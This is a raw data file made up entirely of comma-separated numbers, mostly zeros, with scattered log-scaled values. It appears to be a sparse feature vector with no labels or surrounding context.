0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 7.193685818395112, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 2.550898738446989, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.5263605246161616, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.292158018817389, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.030437921392435, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.044522437723423, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 1.0986122886681098, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 